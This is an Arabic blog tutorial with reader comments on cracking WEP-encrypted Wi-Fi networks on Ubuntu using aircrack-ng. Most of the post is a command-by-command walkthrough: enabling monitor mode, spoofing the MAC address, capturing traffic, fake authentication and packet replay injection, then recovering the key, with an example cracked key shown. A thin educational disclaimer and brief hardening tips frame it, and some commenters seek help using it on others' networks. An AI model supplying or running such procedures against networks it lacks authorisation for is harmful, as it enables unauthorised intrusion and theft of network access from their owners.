إختراق الشبكات اللاسلكية WEP بأبونتو

قبل البداية ما سيتم شرحه وأنا لست من محترفيها فهي مجرد تجارب وتغيير وإختيار طريقة لإستعمالها في كل تجربة أما من جانب أخر فإني بريء دنيا وأخر من سيقوم بإستعمالها في غير محلها وضعة هذا الشرح لتعليم و لتبيين أن هناك خطئ في إستعمال الشبكة الالسلكيه بدون حماية في شركة أو منزل.
إذا وافقت على الشروط فوق فلنكمل وإذا لم توافق فأنت سوف تحاسب على سرقة
هل أنت موافق على الشروط
هل أنت متأكد من أنك قرأة تلك الشروط ووافقة عليها
الشبكات اللاسلكيه (WLAN) هي أي نوع من الشبكات الحاسوبية التي تعمل على نقل المعلومات بين العقد من دون استخدام الأسلاك (التوصيلات) وهذا يسهل على أي شخص التنقل بدون جر ورائه أي سلك للإتصال بالشبكة وهذا لديه إجابيات و سيئات مثل سرعة الإتصال، ضعف الإشارة،وأخرى…،وأخيرا سهولة بعض المرات إختراق هذه الشبكة
نوع التشفير: خوارزميات السرية WEP
مدة الإختراق: لايعرف لذالك إعمل لك كأس شاي،كأسان شاي واحد لي 🙂
برامج الإختراق: حزمت aircrack-ng
نضام التشغيل: أبونتو ليست مشكلة يمكن إستخدام CD live
إضافة: بطاقة شبكة لاسلكية تعمل على أبونتو
سؤال هل وافقت على الشروط سابقا
أستعمل النضام بإمتيازات root
أولا تنصيب الحزمة aircrack-ng
# apt-get install aircrack-ng
وبعده Macchanger
# apt-get install macchanger
وبمجرد تركيب الحزم نتأكد من عدم الإتصال بأي شبكة لاسلكية إذا كنا نستعملها أحداها بضغط أيقونة الشبكة ألاسلكية ونخطار تعطيل

تفعيل وضعية البطاقة إلى الرصد (بعد البطاقات لاتدعم هذه الخاصية، إذا لم تتمكن من تنشيط هذه الخاصية لن تتمكن من الإكمال)
# airmon-ng start wlan0
سيتم إضافة بطاقة بإسم mon0
الأن نقوم بإقافها
# ifconfig mon0 down
نغير عنوان MAC ل mon0 إلى 00:11:22:33:44:55
# macchanger -m 00:11:22:33:44:55 mon0
نقوم الأن بتفعيل mon0 مرة أخرى
# ifconfig mon0 up
نعمل بحث لشبكة على نقطة الوصول (access point) أو الروتر الخاص بنا
# airodump-ng mon0

يضهر في الصورة يوجد 2 الأول إسمه moha إنه الخاص بي والذي أستعمله ،إنه مفتوح أترك الإجابة للأخير،والروتر الأخر إسمه WLAN هو لتجربة وهو موصول لكن لا أحد موصول له لذالك data هو 0
الذي نحتاجه هو عنوان MAC وهو Bssid و #Data عليه أن يكون أحد يستعمله وهذا يقوم بإكثار العدد وأخيرا CH والملاحظ أنه WEP
لتوقيف عمليت البحث Ctrl+c
والأن نعمل مثل محترفي الإختراق ونفتح 20 نافذة جديدة، توقف ليس ناسا (NASA) من سنقوم بإختراقه لذالك نحتاج 4 نوافذ ولانقوم بإغلاق أي واحدة منهم حتى نقوم بإخراج كلمة السر
أولى النوافذ نقوم بإستعمال airodump-ng مع تغيير مفردات بالخاصة بنا
# airodump-ng -c [CH] -w [Name] --bssid [MAC] mon0
ch رقم القنات
name إسم نقطة الوصول أو الروتر
mac عنوان MAC لنقطة الوصول أو الروتر في هذه الحالة Bssid
مثال الخاص بي
# airodump-ng -c 2 -w WLAN --bssid XX:XX:XX:XX:XX:XX mon0

الأن النافذة التالية وهي الثانية إستعمال aireplay-ng ونبدئ الهجوم على الشبكة ونغير
# aireplay-ng -1 6000 -a [MAC] -h 00:11:22:33:44:55 mon0
MAC الذي أستعمل في النافذة الأولى (BSSID) والتي يجب عدم غلقها
مثال
# aireplay-ng -1 6000 -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 mon0

النافذة الثالثة إستعمال aireplay-ng ونغير مثل كل مرة
# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [MAC] -h 00:11:22:33:44:55 mon0
علينا الموافقة ب Y
مثل
# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 mon0

النافذة الرابعة والأخيرة ونستعمل aircrack-ng لفك التشفير على الملفات التي يقوم بإدراجها النوافذ السابقة وهذا يأخذ وقته
# aircrack-ng -z [name]*.cap
مثال
# aircrack-ng -z WLAN*.cap

وبعد مدة يقوم بإدراج حل كلمة الشبكة السلكية xx:xx:xx:xx:xx والملحوض التي حصلة عليها هي 64:F2:4C:A4:19 وتجربتها هل هي تعمل علينا إزالة النقطتان الثنائيتين (64F24CA419)

كيفية تأمين الشبكة سهل لأنه لا يوجد غير إستعمال محيط الواي بي اي WPA وهذا يتم إختراقه عبر تجربة إكلمة وراء كلمة من قاموس بالقوة حتى يتم إجاد تلك الكلمة وإذا لم توجد يتعيين عليه البحث عن قاموس أخر ، وفي الشريكات يجب إستخدام إضافة إلى WPA تصفية ل MAC الذي يوجد في الجدار الخاص بالرتر أو نقطة الإتصال
نسيت عليك تغيير كلمة السر من حين لأخر
أما الخاصة بي فإني حنون على الجران يمكنهم إستعمالها لكنه غير قادرين لأنه يتم إكمال تجربتي عبر التصفية عبر MAC
تحياتي

محمد حنين

الإسم الكامل محمد حنين أحد geek من أمد طويل ، مطور ويب، محب للحرية، مستعمل نضام لينوكس، وأخيرا مجرم باللغة العربية للأسف في وقتها. معلومات أكثر عني أو الإتصال بي Mohammed Hanine

You may also like...

22 تعليق

  1. يقول محمد:

    يقولون: الوقاية خير من العلاج ^_^
    تشفير WEP عفى عليه الزمن، أنا أستخدم WPA2..
    كذلك، أترك ال SSID مخفيا وبالتالي لا يتعرف أحد على شبكتي. أقوم بحصر الإتصال اللاسلكي بمجموعة عناوين MAC الخاصة بحواسيب البيت، أي عنوان يخالفها لا يمكنك استغلال إتصالي 😛

    عموما، لحد الآن لم أنتبه لاستخدام صبيبي من طرف أحد آخر..

    بالمناسبة، هناك الكثير من الشبكات غير المحمية في الحي، دجاجة بكامونها لمن أراد التدرب 😀

  2. يقول mohammed:

    بهذا الحسب حتى الجن الأزرق لايمكنه معرفة إختراق شبكتك اللاسلكية 🙂
    أما بالنسبة يمكنك فتح مقهى حاسوب (مطعم دجاج) على حساب الحي فذالك لن يكلفك شيءا 😀

  3. يقول sub7i:

    فهمت الآن أنت تريد بهذا المقال توعية الناس لمخاطر عدم حماية الشبكات اللاسلكية.. على كل المقال ممتاز ويبدو أنكم أوجدتم له استخدامات عديدة..

  4. يقول mohammed:

    نعم أخي إنه لذالك WEP كمن ليس له حماية
    التصفية عبر MAC تنتهي مع كلمة السر ل WEP لأنه يمكن توهيم تغيير MAC بإستعمال macchanger لأنه بعد المرات يمكنك معرفة MAC المتصلة عبر STATION في الصورة الثانية
    وشكرا على مرورك الغالي

  5. يقول The-LOrd-Saber:

    مرحبا محمد انه موضوع رائع لكن عندي مشكل ممكن تساعدني انظر صورةfile:///home/saber/Bureau/Capture.png

  6. يقول The-LOrd-Saber:

    اوكي المعدرة يا اخي محمد هاهي صورة http://img249.imageshack.us/img249/8712/captureqa.png او http://img249.imageshack.us/i/captureqa.png/

    • يقول mohammed:

      أضن أنها بطاقة من نوع Intel والنضام أبونتو 10.10 إذن الحل
      wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2010-10-16.tar.bz2
      tar -jxf compat-wireless-2010-10-16.tar.bz2
      cd compat-wireless-2010-10-16
      wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
      patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
      wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
      patch ./net/wireless/chan.c channel-negative-one-maxim.patch
      gedit scripts/update-initramfs
      #*** إبحث عن السطر 13: KLIB=/lib/modules/2.6.31-wl/build
      #*** قم بتغييره ليصبح مثل هذا: KLIB=/lib/modules/$(uname -r)/build
      make
      sudo make install
      sudo make unload
      sudo reboot

  7. يقول The-LOrd-Saber:

    مرحبا اخي محمد انا عندي بطاقة من نوع RTL8187/RTL8187B USB wireless

    • يقول mohammed:

      الخطوات السابقة جربتها على بطاقة intel التي عندي وتعمل لكن لم أجد أي usb wirless لتجربة لذالك أنت تخطار هل تجرب أم لا =)
      وإذا وجدت طريقة أخرى أتركها لك .

  8. شكراً لك أخ محمد على هذا المقال ..

    انا أستخدمه لمحاولة اختراق شبكتي المنزلية لأتأكد من درجة حمايتها ولكن حين قمت بالتجربة ظهر لي التالي على التيرمنال

    [email protected]:~$ apt-get install aircrack-ng
    E: Could not open lock file /var/lib/dpkg/lock – open (13: Permission denied)
    E: Unable to lock the administration directory (/var/lib/dpkg/), are you root?

    نعم أخي أنا الرووت ودخولي أدمن حتى أنه عند تنفيذ اﻷمر لم يطلب مني أن أدخل باسوورد الروت وفوراً ظهرت لي هذه الرسالة ؟؟

    فماذا يعني وماذا علي أن أفعل ؟؟

    مع التحية …

    • يقول محمد حنين:

      الحقيقة ليست لك صلاحيات رووت بمجرد النضر إلى $ 🙂
      قم بإضافت قبل كل أمر sudo أو للحصول على صلاحيات روورت sudo su
      عندما تحصل على صلاحية الجذر (روورت) تكون الأورامر معلمة ب # عوض $
      تحياتي 🙂

      • ومنكم نستفيد سيدي …
        طيب لو أخدت من وقتك شوي وعزبتك بكتر أسئلتي فمن بعد رب العالمين مالي غيرك ..
        كتبت sudo su root وكأنو مشي الحال ﻷنو ظهرت البادئة هيك [email protected]:/home/alsha5s#

        طيب لما حطيت اﻷمر اﻷول بالشرح طلعلي هيك
        [email protected]:/home/alsha5s# apt-get install aircrack-ng
        قراءة قوائم الحزم… تمّ0%
        Building dependency tree
        Reading state information… تمّ
        Package aircrack-ng is not available, but is referred to by another package.
        This may mean that the package is missing, has been obsoleted, or
        is only available from another source
        على أيّ فإن الحزم التالية تحلّ مكانها:
        iw

        E: Package ‘aircrack-ng’ has no installation candidate

        ما بعرف شو يعني هاد كلو بس حسيت انو خطأ ؟.. فيا ترى وين المشكلة !!!

        تحياتي اخ محمد وشكراً الك لأنك نبهتني لأمر الدخول بصلاحيات رووت

  9. يمكن اني وجعلك راسك ﻷنو أسئلتي كتيرة
    بس يعلم الله اني دعيتلك من ألبي لما حسيت تجاوب منك وخاصة بتأمين البرنامج

    مشيت مع الشرح بس بعدين ضعت بس وصلت لمرحلة طلعلي فيها التالي

    Opening TP-LINK_5683CA-01.cap
    Read 127 packets.

    # BSSID ESSID Encryption

    1 90:F6:52:56:83:CA TP-LINK_5683CA No data – WEP or WPA

    Choosing first network as target.

    Opening TP-LINK_5683CA-01.cap
    Got no data packets from target network!

    Quitting aircrack-ng…

    يعني أخونا عميئلي انو ما في تشفير مع انو في يا ترى وين خطأي أنا ؟؟؟

    تحياتي أخي محمد ويسلمو كتير ع وقتك

    • يقول محمد حنين:

      لا أعرف كيف أعتذر منك لتأخرى، كان السبب قطع في الأنترنيت
      هل يمكن تأكيد لي أن الروتر يستعمل wep وليس wpa 🙂
      تحياتي وأعتذر مرة أخرى

      • السلام عليكم ..
        ما في داعي للاعتذار أخي محمد
        أنا اللي لازم أعتذر منك على تطفلي المتواصل
        الله يجزيك الخير على كل الللي بتقدمو من معلومات بهالمدونة الفظيعة

        بعد التأكد تبين انها بالفعل WPA مشان هيك توقفت عن المحاولة 🙂

        شكراً لطيب ردك

        تحيتي

  10. مع اني ما فهمت شو بتقصد بطريقة التثبيت وما فهمت اﻷمر

    شكراً أخ محمد

  11. يقول Nawaf:

    الله يعيطيكـ العافيه حبيبي محمد ,, ع الشرح الوافـي ,,
    انا طالب .. في نيوزيلاند ..
    والنت بهل الديره غالي بشكل لايتصور ,, واستخدم كونكت بحدود 100$ اسبوعيا
    وعانيت
    وعندي نظام ابونتو . انا خلفيه في البرمجه بنظام ويندوز اما ابونتو خلفيتي فيه قليله
    ولاكن تعلمته في خلال 3 ايام تثبيته وادخال الاوامر
    اذا قدرت تساعدني ويكون بينا تواصل في الاسكايب .. فقط اخذ من وقتك ,, ربع ساعه

    اكون شاكر .. لكـ

  12. يقول mohmed:

    اخي محمد ممكن لو كنت تعرف برنامج هكر لشبكات الواي فاي ممكن تساعدني بمعرفتها .ممكن نتكلم واتس 00218911808489

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *